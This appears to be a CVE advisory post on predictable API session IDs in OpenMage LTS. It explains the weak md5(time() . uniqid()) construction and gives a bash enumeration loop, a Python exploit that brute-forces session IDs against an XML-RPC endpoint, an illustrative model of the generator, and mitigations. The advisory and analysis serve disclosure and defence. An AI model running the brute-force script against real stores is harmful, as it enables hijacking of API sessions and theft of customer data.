How the CVE works (around 20 lines):
The vulnerability is in `Mage_Api_Model_Session::start()`, where the API session ID is generated as `md5(time() . uniqid('', true))`. No cryptographically secure random source is involved: every input to the MD5 hash is derived from the current Unix timestamp in seconds, the microsecond counter that `uniqid()` appends, and the PHP combined-LCG float that the `true` (more-entropy) flag adds. The optional `$sessionName` argument is never passed, so the hash depends only on time and process state.

Because the login second is observable to an attacker (for example, by timing the login request on the network), the timestamp is known and the microsecond component is confined to that one-second window. The remaining LCG component is seeded deterministically from the PID and time, so its entropy is limited to what that seed provides and its candidate values can be brute-forced offline. The resulting token entropy falls well short of the OWASP ASVS v4 requirement of at least 64 bits for session tokens and of the NIST SP 800-63B guidance.

The attack: record the second of the victim's login, build a candidate pool of MD5 digests by varying the microsecond value and the LCG seed, then replay the candidates as session IDs in high-concurrency requests to the XML-RPC endpoint. `/api/xmlrpc/` applies no rate limiting, so thousands of attempts per second are possible, and a matching candidate is accepted as a valid session ID with full API access. Live evidence from OpenMage 20.16.0 shows five distinct session IDs generated within the same second; the only unknown among them is the LCG float, which is seeded from getpid() ^ time(). The same logic is used for the SOAP v1/v2 and legacy REST endpoints, which are affected identically.
dailycve form:
Platform: OpenMage LTS
Version: ≤ 20.16.0
Vulnerability: Weak session entropy
Severity: Critical
Date: 2025-05-06
Prediction: Patch within 14 days
What Undercode Say:
# Simulate entropy exhaustion with time offsets: enumerate uniqid()'s "%08x%05x"
# prefix over a two-second window. uniqid() formats the raw microsecond value
# (not usec/10) and, with more_entropy, appends lcg_value()*10 as "%.8F";
# this sweep does not enumerate that suffix.
for sec in {0..1}; do
  for usec in {464631..600118..1000}; do
    uid=$(printf '%08x%05x' $((1775817593+sec)) "$usec")
    printf '%s%s' "$((1775817593+sec))" "$uid" | md5sum
  done
done | sort | uniq -c
# Check if a CSPRNG is used in the patched version
grep -n "random_bytes" app/code/core/Mage/Api/Model/Session.php
Exploit:
import hashlib
import requests
TARGET = "https://shop.example/api/xmlrpc/"  # placeholder host; the original posted to a bare path
observed_sec = 1775817593
# uniqid('', true) is "%08x%05x%.8F": hex seconds, hex microseconds, then lcg_value()*10
# to 8 decimals. The LCG suffix is the remaining unknown and must be enumerated too
# (placeholder list; fill it with the values derived for the target).
lcg_suffixes = ["0.00000000"]
candidates = []
for usec in range(464000, 601000, 500):
    uid = f"{observed_sec:08x}{usec:05x}"
    for lcg in lcg_suffixes:
        candidates.append(hashlib.md5(f"{observed_sec}{uid}{lcg}".encode()).hexdigest())
# The XML-RPC server exposes call(sessionId, resourcePath); magento.info is the resource path.
body = ("<methodCall><methodName>call</methodName><params>"
        "<param><value><string>{sid}</string></value></param>"
        "<param><value><string>magento.info</string></value></param></params></methodCall>")
for sid in candidates:
    r = requests.post(TARGET, data=body.format(sid=sid), headers={"Content-Type": "text/xml"}, timeout=10)
    if "faultCode" not in r.text:  # an invalid session returns an XML-RPC fault
        print(f"Hijacked: {sid}")
        break
Protection from this CVE:
Replace `md5(time() . uniqid('', true))` with `bin2hex(random_bytes(32))` in start(). Enforce API rate limiting (e.g., 5 requests/sec per IP). Disable the legacy XML-RPC/SOAP endpoints if unused. Upgrade to OpenMage LTS > 20.16.0 once a patch is released.
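To make the weak construction described under "How the CVE works" concrete, and to set it beside the hardened replacement recommended above, here is an added Python model. It is not OpenMage's own code and not the exploit from this post. It reproduces the output layout of PHP's `uniqid('', true)`, `%08x%05x%.8F`, from PHP's source; the function names `php_uniqid`, `weak_session_id`, `recover`, `search_space_bits`, `strong_session_id` and the sample timestamp, microsecond and LCG values are assumptions made for this illustration.

```python
"""Added example (not OpenMage code): a model of the weak API session-ID
construction, the candidate search an attacker runs against it, and the
hardened replacement. The uniqid('', true) layout "%08x%05x%.8F" follows
PHP's ext/standard/uniqid.c; all sample values below are constructed."""
import hashlib
import math
import secrets


def php_uniqid(sec: int, usec: int, lcg: float) -> str:
    """PHP uniqid('', true): seconds as 8 hex digits, microseconds as 5 hex
    digits, then lcg_value()*10 printed with 8 decimals."""
    return f"{sec:08x}{usec:05x}{lcg * 10:.8f}"


def weak_session_id(sec: int, usec: int, lcg: float) -> str:
    """md5(time() . uniqid('', true)), the construction in start()."""
    material = f"{sec}{php_uniqid(sec, usec, lcg)}"
    return hashlib.md5(material.encode()).hexdigest()


def strong_session_id() -> str:
    """Hardened form: 256 bits from the OS CSPRNG, the Python equivalent of
    bin2hex(random_bytes(32))."""
    return secrets.token_hex(32)


def recover(target_sid, sec, lcg_candidates, usec_lo=0, usec_hi=1_000_000):
    """Search the weak generator's output space for the second `sec`, given
    the LCG values the attacker considers possible. Returns the (usec, lcg)
    pair that reproduces target_sid, or None when no candidate matches."""
    for usec in range(usec_lo, usec_hi):
        for lcg in lcg_candidates:
            if weak_session_id(sec, usec, lcg) == target_sid:
                return usec, lcg
    return None


def search_space_bits(usec_window: int, lcg_candidates: int) -> float:
    """log2 of the candidate count the attacker must try: microsecond window
    times number of LCG candidates. Compare against the 64-bit ASVS floor."""
    return math.log2(usec_window * lcg_candidates)


if __name__ == "__main__":
    # Constructed sample: the victim logged in at second 1775817593, the
    # server clock read 464631 us, and the LCG produced 0.31415926.
    sec, usec, lcg = 1775817593, 464631, 0.31415926
    sid = weak_session_id(sec, usec, lcg)
    print("victim session id:", sid)
    # The attacker knows only the second and a short list of plausible LCG outputs.
    print("recovered:", recover(sid, sec, [0.1, 0.31415926, 0.9], 464000, 465000))
    print("search space with one known LCG value: %.1f bits"
          % search_space_bits(1_000_000, 1))
    print("hardened id:", strong_session_id())
```

Running it recovers the victim's microsecond and LCG value from a 1000-microsecond window and three LCG candidates. `search_space_bits(1_000_000, 1)` comes to just under 20 bits, which is the whole search space once the LCG suffix is known; it also shows why a candidate list that omits the `%.8F` suffix can never match a real ID, since that suffix is part of the hashed material.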
Impact:
Full API takeover – read/write products, customer PII, orders, inventory. Leads to data exfiltration, fraudulent orders, price manipulation, and supply chain compromise. No authentication bypass required; attacker only needs victim’s login timestamp.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

